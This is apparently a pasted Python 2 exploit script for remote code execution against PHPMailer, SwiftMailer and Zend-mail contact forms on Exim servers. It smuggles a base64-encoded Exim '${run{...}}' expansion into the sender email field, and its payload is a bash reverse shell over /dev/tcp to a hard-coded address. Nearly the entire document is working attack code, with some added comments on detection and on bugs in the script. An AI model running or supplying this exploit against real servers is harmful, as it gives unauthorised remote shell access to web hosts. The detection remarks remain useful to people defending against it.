AZZATSSINS_CYBERSERK

PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution

Jun 22nd, 2017
  1. import argparse
  2. import urllib
  3. import urllib2
  4. import base64
  5.  
# Prepare command for Exim expansion mode.
#
# Base64-encodes `cmd` and wraps it in an Exim string expansion of the form
# `${run{${base64d:<b64>}}}`.  The returned value is later embedded in the
# sender e-mail field, so the address carries only base64 text rather than
# the command itself -- anyone inspecting mail logs for this pattern has to
# decode the `${base64d:` argument to see what was run.  The `${run{` /
# `${base64d:` markers inside an envelope sender are the signal to alert on.
# `cmd` is a Python 2 str; b64encode here consumes it as bytes-as-str.
def prepare_cmd(cmd):
    return '${run{${base64d:%s}}}' % base64.b64encode(cmd)
  9.  
# Send Request method.
#
# Opens `req` with urllib2.urlopen and discards the response body; the only
# things reported are transport / HTTP failures.  Exit codes: 3 on HTTPError,
# 4 on URLError (3 is also reused by the menu check further down).
# NOTE: in both handlers the `%` operator binds only to the last string
# fragment (`" - Check the URL!\n\n" % e.code`), which contains no conversion
# specifier, so the error path raises TypeError ("not all arguments
# converted") instead of printing the message.  Python 2 `except X, e` syntax.
def send_request(req):
    try:
        urllib2.urlopen(req)
    except urllib2.HTTPError, e:
        print "[!] Got HTTP error: [%d] when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % e.code
        exit(3)
    except urllib2.URLError, err:
        print "[!] Got the '%s' error when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % err.reason
        exit(4)
  20.  
# Script body (Python 2: print statements, raw_input, urllib/urllib2).
#
# Flow: parse CLI args -> echo them -> interactive target menu -> build the
# Exim-expansion sender string -> POST it as the "email" field of a contact
# form.  The injection point is the sender e-mail value; on the receiving
# side a mail-log entry whose envelope sender contains `-be` and `${run{` is
# the detection signal, and the page title gives the fixed PHPMailer version
# (5.2.20) as the mitigation.

# Parse input args
parser = argparse.ArgumentParser(prog='rce_phpmailer_exim4.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit for Exim4 based on LegalHackers sendmail version')
parser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True,  help='WebApp Base Url')
parser.add_argument('-cf',  dest='CONTACT_SCRIPT',  required=True,  help='Contact Form scriptname')
parser.add_argument('-ip',  dest='ATTACKER_IP',    required=True,  help='Attacker IP for reverse shell')
parser.add_argument('-p',   dest='ATTACKER_PORT',  required=False, help='Attackers Port for reverse shell', default="8888")
# NOTE: the help text says these override field *names*, but only
# --post-name / --post-email / --post-msg are used as dict keys below;
# --post-action becomes the *value* of a fixed 'action' key.
parser.add_argument('--post-action', dest='POST_ACTION',  required=False, help='Overrides POST "action" field name',         default="send")
parser.add_argument('--post-name',   dest='POST_NAME',    required=False, help='Overrides POST "name of sender" field name', default="name")
parser.add_argument('--post-email',  dest='POST_EMAIL',   required=False, help='Overrides POST "email" field name',          default="email")
parser.add_argument('--post-msg',    dest='POST_MSG',     required=False, help='Overrides POST "message" field name',        default="msg")
args = parser.parse_args()

# Plain concatenation, no separator: -url must end with "/" (or -cf start with one).
CONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT

# Show params.  ATTACKER_IP / ATTACKER_PORT are only ever echoed here -- they
# are not substituted into `cmd` below, which carries its own hard-coded
# address and port.
print """[+] Setting vars to: \n
WEBAPP_BASE_URL      = [%s]
CONTACT_SCRIPT       = [%s]
ATTACKER_IP          = [%s]
ATTACKER_PORT        = [%s]
POST_ACTION          = [%s]
POST_NAME            = [%s]
POST_EMAIL           = [%s]
POST_MSG             = [%s]
""" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.ATTACKER_IP, args.ATTACKER_PORT, args.POST_ACTION, args.POST_NAME, args.POST_EMAIL, args.POST_MSG)

# Ask for mail library.  The menu text lists the CVE ids of the two payload
# variants; only the numeric choice changes behaviour (`target == 2` below).
print "[+] Choose your target / payload: "
print "\033[1;34m"  # ANSI bold blue for the menu
print """[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)"""
print """    SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)"""
print """    Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n"""
print """[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass"""
print "\033[0m"  # reset ANSI attributes

# Non-numeric input -> exit code 2.
try:
    target = int(raw_input('[?] Select target [1-2]: '))
except ValueError:
    print "Not a valid choice. Exiting\n"
    exit(2)

# Only the upper bound is checked: 0 and negative values are accepted and
# fall through to the target-1 payload (exit code 3 is shared with HTTPError).
if (target>2):
    print "No such target. Exiting\n"
    exit(3)

################################
# Payload
################################
# Reverse-shell one-liner with a hard-coded destination of 192.168.1.19:1337;
# the -ip / -p arguments parsed above are never used here.
cmd = "/bin/bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.19/1337;nohup sh <&196 >&196 2>&196 &'"
prepared_cmd = prepare_cmd(cmd)

# Sender string for target 1: a quoted local part containing an escaped
# double quote, the `-be` flag, the expansion from prepare_cmd, and a
# trailing "@a.co" that keeps the whole value shaped like an address.
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'

# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20): the target-2
# variant differs only in using an escaped single quote instead of the
# escaped double quote.
if target == 2:
    payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"

################################
# Attack episode
# This step will execute the reverse shell
################################

# Form fields: the --post-* options supply the key names for name/email/msg,
# the payload goes into the e-mail field, the other values are filler.
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}

# Print relevant information (the same strings a WAF / form-handler log
# would record for this request).
print "\n[+] Executing command on victim server\n"
print '[!] command: [%s]' % cmd
print '[!] payload: [%s]' % payload
print '[!] post_fields: [%s]\n' % str(post_fields)

# urlencode + Request(url, data) => an application/x-www-form-urlencoded POST;
# no custom headers, so the default Python-urllib User-Agent is sent.
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
send_request(req)

# Reached only if urlopen did not raise; the HTTP response itself is never
# inspected, so this message says nothing about whether the command ran.
print "\033[1;32m[+] You should check your listener and cross the fingers ;)\033[0m\n"